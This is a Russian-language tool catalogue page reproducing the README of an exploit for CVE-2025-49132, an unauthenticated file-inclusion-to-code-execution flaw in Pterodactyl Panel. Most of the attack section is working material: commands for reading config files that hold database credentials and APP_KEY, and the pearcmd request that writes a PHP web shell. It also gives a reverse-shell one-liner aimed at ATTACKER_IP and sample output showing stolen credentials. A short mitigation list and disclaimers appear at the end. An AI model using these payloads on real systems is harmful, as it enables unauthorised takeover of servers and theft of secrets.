Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-49132 — CVE для Pterodactyl (для изучения и образования) | Kitploit
Инструменты/GitHubGitHub/popyue/cve-2025-49132
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеОбучение и Образование
GitHubpopyue/cve-2025-49132

CVE-2025-49132

CVE для Pterodactyl (для изучения и образования)

Репозиторий
4107 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-49132 - Эксплойт для панели Pterodactyl

⚠️ Отказ от ответственности: Этот репозиторий создан только в образовательных и исследовательских целях в рамках моего исследования безопасности для понимания и документирования CVE-2025-49132. Все авторские права на обнаружение уязвимости принадлежат первоначальным исследователям.

  ___ __   __ ___      ___   ___  ___  ___        _  _   ___  _  ____  ___ 
 / __|\ \ / /| __|___ |_  ) / _ \|_  )| __|___   | || | / _ \| ||__ / |_  )
| (__  \ V / | _|___|  / / | (_) |/ / |__ \___|  |_  _| \_, /| ||_ \  / / 
 \___|  \_/  |___|    /___| \___//___||___/        |_|   /_/ |_|___/ /___|

        Панель Pterodactyl - От LFI без аутентификации к RCE

📋 Описание

CVE-2025-49132 — это уязвимость Local File Inclusion (LFI) без аутентификации в панели Pterodactyl, которая может быть повышена до удаленного выполнения кода (RCE) через pearcmd.php в PHP.

Уязвимость существует в конечной точке /locales/locale.json, которая не выполняет надлежащую санитацию параметров locale и namespace, что позволяет злоумышленникам читать произвольные PHP-файлы конфигурации и добиваться выполнения кода.

🎯 Затронутые версии

СтатусВерсия
❌ Уязвимые<= 1.11.10
✅ Исправленные>= 1.11.11

⚡ Возможности

  • Режим LFI: Чтение PHP-файлов конфигурации (учётные данные БД, APP_KEY и т.д.)
  • Режим RCE: Удалённое выполнение кода через технику LFI2RCE с pearcmd.php
  • Интерактивная оболочка: Постоянная оболочка для выполнения нескольких команд
  • Одиночная команда: Выполнение одной команды
  • Красивый вывод: Цветной, форматированный вывод для лучшей читаемости

📦 Установка

# Клонировать репозиторий
git clone https://github.com/YOUR_USERNAME/CVE-2025-49132.git
cd CVE-2025-49132

# Установить зависимости
pip install requests

Требования

  • Python 3.6+
  • Библиотека requests
  • curl (для режима RCE)

🚀 Использование

LFI - Чтение конфигурационных файлов

# Чтение конфигурации базы данных
python exploit.py -u http://target.com --read -p ../../config -f database

# Чтение конфигурации приложения (содержит APP_KEY)
python exploit.py -u http://target.com --read -p ../../config -f app

# Чтение других конфигураций
python exploit.py -u http://target.com --read -p ../../config -f auth
python exploit.py -u http://target.com --read -p ../../config -f session
python exploit.py -u http://target.com --read -p ../../config -f mail

RCE - Удалённое выполнение кода

# Выполнение одной команды
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "id"
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "whoami"

# Режим интерактивной оболочки
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR

# Реверс-шелл
python exploit.py -u http://target.com --rce -p ../../../../../../usr/share/php/PEAR --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Распространённые пути PEAR

ДистрибутивПуть
Debian/Ubuntu../../../../../../usr/share/php
SUSE/OpenSUSE../../../../../../usr/share/php/PEAR
CentOS/RHEL../../../../../../usr/share/pear
Alpine../../../../../../usr/share/php8

📖 Аргументы

АргументОписание
-u, --urlЦелевой URL (обязательно)
-p, --pathПуть для обхода каталогов (LFI) или путь к PEAR (RCE)
-f, --filePHP-файл для чтения (без расширения .php)
--readВключить режим чтения LFI
--rceВключить режим RCE
--cmdКоманда для выполнения (режим однократного выполнения)
--sdirКаталог для записи оболочки (по умолчанию: /tmp)
--snameИмя файла оболочки (по умолчанию: shell)

🔬 Как это работает

LFI (Local File Inclusion)

Уязвимая конечная точка /locales/locale.json принимает параметры locale и namespace:

GET /locales/locale.json?locale=../../config&namespace=database

Это позволяет читать любые PHP-файлы, возвращающие массив, включая файлы конфигурации Laravel.

RCE (Remote Code Execution)

Эксплойт использует LFI вместе с pearcmd.php для достижения RCE:

  1. Этап 1: Использование команды config-create в pearcmd.php для записи PHP-веб-шелла

    /locales/locale.json?+config-create+/&locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd&/<?=system(...)?>+/tmp/shell.php
    
  2. Этап 2: Включение записанного шелла через LFI

    /locales/locale.json?locale=../../../../../../tmp&namespace=shell&c=<hex_encoded_cmd>
    

📸 Скриншоты

LFI - Чтение конфигурации базы данных

════════════════════════════════════════════════════════════
  КОНФИГУРАЦИЯ БАЗЫ ДАННЫХ
════════════════════════════════════════════════════════════

  default: mysql
  connections:
    mysql:
      driver: mysql
      host: 127.0.0.1
      port: 3306
      database: panel
      username: pterodactyl
      password: SecretPassword123

────────────────────────────────────────────────────────────
[+] Конфигурация успешно извлечена!

RCE - Выполнение команды

[*] Цель: http://panel.example.com
[*] Выполнение команды: id
[*] Запись полезной нагрузки в: /tmp/cmd_abc123.php
[+] Вывод:
----------------------------------------
uid=474(wwwrun) gid=477(www) groups=477(www)
----------------------------------------

🛡️ Меры защиты

  1. Обновите панель Pterodactyl до версии 1.11.11 или новее
  2. Реализуйте надлежащую валидацию входных данных для параметров locale и namespace
  3. Используйте белый список для допустимых значений локалей/пространств имён
  4. Ограничьте директиву PHP register_argc_argv

⚠️ Отказ от ответственности

Этот инструмент предоставляется только для образовательных и авторизованных целей тестирования безопасности.

  • Используйте этот инструмент только на системах, которые вам принадлежат или на которые у вас есть явное письменное разрешение на тестирование
  • Несанкционированный доступ к компьютерным системам является незаконным
  • Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом

Используйте ответственно и этично.

📚 Ссылки

  • Официальный сайт Pterodactyl Panel
  • Pterodactyl Panel на GitHub
  • Описание CVE-2025-49132
  • CVE-2025-49132: Pterodactyl Panel позволяет неавторизованное удалённое выполнение произвольного кода
  • Техника LFI to RCE через PEAR
  • Генератор цепочек PHP-фильтров
  • От LFI к RCE

📝 История изменений

  • v1.0.0 - Первый релиз
    • Чтение конфигурации через LFI
    • RCE через pearcmd
    • Режим интерактивной оболочки
    • Красивый форматированный вывод

⭐ Поставьте звезду этому репозиторию, если он оказался полезным!

Скачать инструмент